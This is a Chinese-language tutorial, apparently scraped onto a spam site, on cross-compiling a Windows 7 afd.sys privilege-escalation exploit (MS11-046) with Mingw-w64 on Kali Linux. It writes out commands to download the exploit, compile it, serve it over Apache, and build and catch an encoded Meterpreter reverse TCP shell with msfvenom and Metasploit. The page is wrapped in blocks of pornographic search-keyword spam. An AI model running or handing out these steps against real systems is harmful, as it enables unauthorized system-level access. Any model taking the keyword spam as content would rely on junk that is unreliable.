日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

在Kali Linux上編譯Windows漏洞的方法

瀏覽:325日期:2022-06-04 09:46:52

如何在Kali Linux上編譯Windows漏洞!

Mingw-w64是一個用于創建Windows應用程序的自由和開源軟件開發環境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

Mingw-w64是一個用于創建Windows應用程序的自由和開源軟件開發環境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。

在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此,我們需要先安裝它,然后才能在Linux上編譯Windows漏洞。 執行以下命令,安裝Mingw-w64:

apt-get update apt-get install mingw-w64

使用apt-get install mingw-w64在您的Kali主機上安裝mingw-w64。

鍵入y為yes,以確認并繼續Mingw-w64安裝過程。 下載和安裝Mingw-w64可能需要一段時間才能完成。

2、無法找到程序包mingw-w64的解決方法

有時,你嘗試安裝mingw-w64包時得到一個無法找到包mingw-w64的錯誤,并得到類似如下提示:

root@kali:~# apt-getinstall mingw-w64 Reading package lists…Done Building dependency tree Reading stateinformation… Done E: Unable to locatepackage mingw-w64

要解決這個問題,請確保在sources.list文件中具有正確的存儲庫。您可以使用nano編輯文件:

/etc/apt/sources.list

確保您在此文件中具有正確的存儲庫。 您可以在以下頁面上找到不同版本的Kali Linux的存儲庫:

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲庫,您需要運行apt-get update,然后再次運行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現在我們已經安裝了Mingw-w64,可以開始編譯Windows漏洞利用程序了。 對于本教程,我們將編譯一個用C編寫的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統在輔助功能驅動程序(AFD)中包含一個漏洞,允許已認證的非管理用戶提升權限。即使Mingw-w64是為非常需要的64位支持開發的,我們也可以編譯32位Windows漏洞。 讓我們來看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權升級漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32

編譯Windows漏洞。

要將漏洞利用程序轉移到目標主機,我們將使用內置的ApacheWeb服務器來提供它。 最后2個命令會將exploit復制到Apache主目錄并啟動Apache Web服務器。

當我們從cmd.exe下載并執行該漏洞時,它將如下所示:

漏洞利用成功執行。

因為我們可以看到whoami命令在執行exploit之前返回一個普通用戶權限,之后顯示是system用戶權限。這個exploit實際上在當前shell中生成一個新的shell,而不是在新窗口中創建一個新的shell。這意味著我們也可以從命令行shell運行此漏洞利用程序,例如Meterpreter。讓我們看看如何從Meterpreter會話運行漏洞利用。

4、利用編譯錯誤

當編譯針對不同架構和操作系統的漏洞時,可能會發生許多錯誤。有很多因素可能導致編譯失敗,例如:語法,庫,主機和目標體系結構,用于編譯代碼的已安裝軟件等等。一些錯誤可能很容易修復,有些錯誤則不是。同樣重要的是不同的警告來自致命的錯誤,因為警告可能只是指示一些類似的過時的功能,不能阻止漏洞的工作。致命錯誤會阻止漏洞利用,因此需要修復。

處理編譯錯誤的最佳方法是仔細閱讀,然后在Google上搜索解決方案。通常你不是第一個也不是唯一面對某個編譯錯誤的人,因此沒有必要重新發明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負載,并在目標主機上執行它。 我們將在Metasploit中使用多處理程序來捕獲反向shell。

使用以下命令使用Msfvenom創建有效負載:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請務必更換偵聽主機IP,必要時更換偵聽端口。現在啟動msfconsole并運行以下命令來設置多處理器漏洞:

use exploit/multi/handler set lhost [listening host IP] set lport 4444 run

在端口4444上啟動反向TCP處理程序。

然后下載利用程序到目標主機并執行它。 如果一切設置正確,您應該在msfconsole上收到一個反向Meterpreter shell:

目標主機連接回Kali。

在Meterpreter命令行上運行下一“shell”命令并運行特權升級漏洞利用程序將shell升級到系統shell:

特權升級攻擊通過我們的Meterpreter會話成功執行。

正如你可以看到的,shell從特權測試用戶shell變化到系統shell。 請注意,在執行它的shell中生成一個新的系統shell。 因此,我們不能看到利用輸出,因為它是在有限的特權的舊shell。

您可以通過鍵入Exit來驗證這一點,將退出系統shell并返回到仍包含Windows 7權限升級exploit輸出的用戶shell:

特權用戶shell上的exploit輸出。

學到的東西

在本教程中,我們已經了解了在Linux上針對Windows的交叉編譯漏洞的基礎知識。 我們已經學習了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題。 為了練習漏洞編譯過程,我們編譯了一個針對Windows7 x86的特權提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標主機上執行已編譯的可執行文件,并將shell從有限的用戶shell升級到系統shell。 我們已經知道,這個特殊的exploit在shell中生成了一個shell,在這個shell中執行了exploit。 這樣,我們還可以從命令行(例如Meterpreter shell)執行特權提升漏洞利用。

最后但同樣重要的是,我們已經了解了如何在編譯過程中修復錯誤。

相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
欧美一级网站| 蜜臀精品一区二区三区在线观看 | 国产激情欧美| 国产麻豆一区二区三区| 国产精品久久777777毛茸茸| 国产精品毛片aⅴ一区二区三区| 精品一区二区三区四区五区| 97人人精品| 亚洲高清av| 亚洲最新av| 久久精品国产福利| 天堂资源在线亚洲| 亚洲欧洲美洲国产香蕉| 国产欧美午夜| 色综合www| www在线观看黄色| 欧美/亚洲一区| 日韩一区二区三区高清在线观看 | 日韩精彩视频在线观看| 福利片在线一区二区| 亚洲大全视频| 日韩黄色av| 国产理论在线| 亚洲深夜福利在线观看| 国产精品久久久久久久久久久久久久久| 精品国产一级| 亚洲一区成人| 国产精品nxnn| 精品欧美日韩精品| 亚洲欧洲午夜| 亚久久调教视频| 久久久久久一区二区| 免费中文字幕日韩欧美| 日本精品久久| 日韩欧美一区二区三区在线视频| 亚洲视频电影在线| 精品国产精品国产偷麻豆| 欧美色图一区| 亚洲精品一级| 亚洲成人不卡| 日韩极品在线观看| 中文字幕系列一区| 亚洲欧美日韩国产一区| 日韩福利在线观看| 蜜臀av免费一区二区三区| 欧美在线看片| 欧美肉体xxxx裸体137大胆| 日本国产欧美| 亚洲精品97| 国产精品www.| 中文字幕乱码亚洲无线精品一区| 久久久久久婷| 中文字幕一区二区三区日韩精品 | 日韩欧美久久| 久久精品主播| 国产精品最新| 羞羞答答国产精品www一本| 最近高清中文在线字幕在线观看1| aa国产精品| 丝袜诱惑一区二区| 日本不卡的三区四区五区| 91精品福利| 日韩一区自拍| 里番精品3d一二三区| 一区二区三区四区日韩| 亚洲高清激情| 中文字幕在线免费观看视频| 中文无码日韩欧| 久久久夜精品| 麻豆免费精品视频| 日本va欧美va瓶| 久久国产高清| 日韩欧美综合| 国产一区不卡| 日韩午夜视频在线| 亚洲综合欧美| 亲子伦视频一区二区三区| 国产精品久久国产愉拍| 日本中文字幕不卡| 伊人影院久久| 欧美1级日本1级| av资源中文在线天堂| 女主播福利一区| 精品一区二区三区中文字幕在线| 中文字幕一区二区精品区| 伊人久久亚洲美女图片| 亚洲风情在线资源| 欧美精品97| 国产精品三p一区二区| 日韩高清二区| 亚洲乱码久久| 日韩激情网站| 日韩av中文字幕一区二区| 亚洲影院天堂中文av色| 视频一区视频二区中文字幕| 天堂成人免费av电影一区| 国产视频一区三区| 欧洲精品一区二区三区| 美女一区网站| 日韩精品首页| 激情婷婷综合| 99国产精品| 久久成人精品| 亚洲色图网站| 日本a级不卡| 久久超级碰碰| 美日韩一区二区三区| 久久精品国产在热久久| 国产精品黑丝在线播放| 91综合视频| 人人精品亚洲| 久久电影一区| 久热精品在线| 青草久久视频| 国产精品22p| 日韩成人综合| 性欧美精品高清| 日本午夜免费一区二区| 欧美特黄a级高清免费大片a级| 高清av不卡| 国产乱码精品一区二区三区四区 | 91久久午夜| 日本成人在线一区| 免费在线日韩av| 黄色在线网站噜噜噜| 欧美在线影院| 午夜在线精品| 日本一区二区三区中文字幕| 国产精品xxx| 91精品国产调教在线观看| 91超碰国产精品| 日本不卡不码高清免费观看 | 97精品一区| 91成人精品| 国产另类在线| 视频一区中文| 91欧美精品| 久久尤物视频| 99国产精品免费视频观看| 国产美女一区| 午夜性色一区二区三区免费视频| 蜜臀久久99精品久久久久宅男| 国产毛片精品久久| 国产一区二区色噜噜| 影视先锋久久| 欧美影院精品| 波多视频一区| 亚洲ab电影| 精品免费在线| 日韩在线观看一区二区| 精品一区二区三区中文字幕 | 激情欧美一区| 日韩毛片一区| 色88888久久久久久影院| 日本一区二区三区视频在线看| 福利一区二区免费视频| 一区二区国产在线观看| 日韩欧美在线中字| 日韩精品电影一区亚洲| 久久影视一区| 麻豆久久久久久| 午夜久久福利| 精品精品99| 欧美视频精品全部免费观看| 久久久久蜜桃| 综合激情婷婷| 久久一级电影| 精品国产一级| 国产探花一区| 国产精品腿扒开做爽爽爽挤奶网站| 久久久久伊人| 午夜久久av | 日韩国产欧美三级| 免费精品国产| 国产精品yjizz视频网| 国产调教精品| 亚洲91精品| 亚洲精品永久免费视频| 国产精品亚洲综合在线观看| 国产模特精品视频久久久久| 日韩欧美综合| 欧美1区二区| 欧美永久精品| 亚洲欧美久久精品| 悠悠资源网久久精品| 久久国产直播| 黑人精品一区| 美女视频网站久久| 国产精品入口久久| 日本不卡一二三区黄网| 国产亚洲毛片| yellow在线观看网址| 免费看一区二区三区| 欧美精品中文| 久久国产视频网| 国产日韩欧美一区在线| 日本综合视频| 日韩激情精品| 日韩精品a在线观看91| 日韩一区二区三区免费视频|